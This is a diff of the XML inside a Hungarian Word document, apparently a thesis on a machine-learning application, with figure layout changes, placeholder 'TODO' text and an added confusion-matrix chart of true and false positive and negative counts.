+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
+                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId19"/>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.2-es ábra: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20025,7 +20206,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18" cstate="print">
+                    <a:blip r:embed="rId20" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -20117,7 +20298,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19" cstate="print">
+                    <a:blip r:embed="rId21" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -20200,9 +20381,9 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281962E8" wp14:editId="0296E34E">
-            <wp:extent cx="4320000" cy="2543040"/>
-            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281962E8" wp14:editId="0B520AD8">
+            <wp:extent cx="4103251" cy="2317750"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
             <wp:docPr id="14" name="Kép 14"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -20214,26 +20395,33 @@
                     <pic:cNvPr id="14" name="Kép 14"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId20" cstate="print">
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId22" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                         </a:ext>
                       </a:extLst>
                     </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
+                    <a:srcRect l="4999" b="8841"/>
+                    <a:stretch/>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4320000" cy="2543040"/>
+                      <a:ext cx="4104058" cy="2318206"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -20266,344 +20454,20 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>TODO</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:sectPr>
-          <w:headerReference w:type="default" r:id="rId21"/>
-          <w:footerReference w:type="default" r:id="rId22"/>
-          <w:headerReference w:type="first" r:id="rId23"/>
-          <w:pgSz w:w="11906" w:h="16838"/>
-          <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
-          <w:cols w:space="708"/>
-          <w:titlePg/>
-          <w:docGrid w:linePitch="360"/>
-        </w:sectPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F30B83E" wp14:editId="4DB24774">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>4103370</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>1511300</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="377825" cy="219075"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:wrapNone/>
-                <wp:docPr id="11" name="Szövegdoboz 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="377825" cy="219075"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:noFill/>
-                        <a:ln w="9525">
-                          <a:noFill/>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                              <w:t>…</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shapetype w14:anchorId="2F30B83E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:path gradientshapeok="t" o:connecttype="rect"/>
-              </v:shapetype>
-              <v:shape id="Szövegdoboz 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:323.1pt;margin-top:119pt;width:29.75pt;height:17.25pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                        <w:t>…</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EF013A1" wp14:editId="3A75825B">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>2795270</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>1416050</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="377825" cy="219075"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:wrapNone/>
-                <wp:docPr id="217" name="Szövegdoboz 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="377825" cy="219075"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:noFill/>
-                        <a:ln w="9525">
-                          <a:noFill/>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                              <w:t>…</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape w14:anchorId="3EF013A1" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:220.1pt;margin-top:111.5pt;width:29.75pt;height:17.25pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                        <w:t>…</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28834D53" wp14:editId="224264A5">
-            <wp:extent cx="8891270" cy="2169160"/>
-            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
-            <wp:docPr id="5" name="Kép 5"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="5" name="Kép 5"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId24">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="8891270" cy="2169160"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1-es ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">machine_learning_app, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a program fő mappájának felépítése</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TODO</w:t>
+        <w:t>TOD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>O</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
+      <w:headerReference w:type="default" r:id="rId23"/>
+      <w:footerReference w:type="default" r:id="rId24"/>
+      <w:headerReference w:type="first" r:id="rId25"/>
+      <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
       <w:titlePg/>
@@ -24981,6 +24845,2371 @@
 </w:styles>
 </file>
 
+<file path=word/charts/chart1.xml><?xml version="1.0" encoding="utf-8"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
+  <c:date1904 val="0"/>
+  <c:lang val="hu-HU"/>
+  <c:roundedCorners val="0"/>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice xmlns:c14="http://schemas.microsoft.com/office/drawing/2007/8/2/chart" Requires="c14">
+      <c14:style val="103"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <c:style val="3"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <c:clrMapOvr bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
+  <c:chart>
+    <c:title>
+      <c:tx>
+        <c:rich>
+          <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="50000"/>
+                    <a:lumOff val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Confusion matrix for 100 samples</a:t>
+            </a:r>
+          </a:p>
+        </c:rich>
+      </c:tx>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="50000"/>
+                  <a:lumOff val="50000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mj-lt"/>
+              <a:ea typeface="+mj-ea"/>
+              <a:cs typeface="+mj-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:title>
+    <c:autoTitleDeleted val="0"/>
+    <c:plotArea>
+      <c:layout/>
+      <c:barChart>
+        <c:barDir val="col"/>
+        <c:grouping val="stacked"/>
+        <c:varyColors val="0"/>
+        <c:ser>
+          <c:idx val="0"/>
+          <c:order val="0"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$B$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$B$3:$B$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>41</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>46</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>36</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>0</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000000-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="1"/>
+          <c:order val="1"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$C$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="40000"/>
+                <a:lumOff val="60000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$C$3:$C$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>6</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>49</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>12</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>48</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000001-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="2"/>
+          <c:order val="2"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$D$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="20000"/>
+                <a:lumOff val="80000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$D$3:$D$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>37</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>49</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>8</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>0</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000002-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="3"/>
+          <c:order val="3"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$E$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="60000"/>
+                <a:lumOff val="40000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$E$3:$E$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>11</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>46</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>39</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>47</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000003-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:dLbls>
+          <c:showLegendKey val="0"/>
+          <c:showVal val="0"/>
+          <c:showCatName val="0"/>
+          <c:showSerName val="0"/>
+          <c:showPercent val="0"/>
+          <c:showBubbleSize val="0"/>
+        </c:dLbls>
+        <c:gapWidth val="150"/>
+        <c:overlap val="100"/>
+        <c:axId val="15898064"/>
+        <c:axId val="15898480"/>
+      </c:barChart>
+      <c:catAx>
+        <c:axId val="15898064"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="b"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
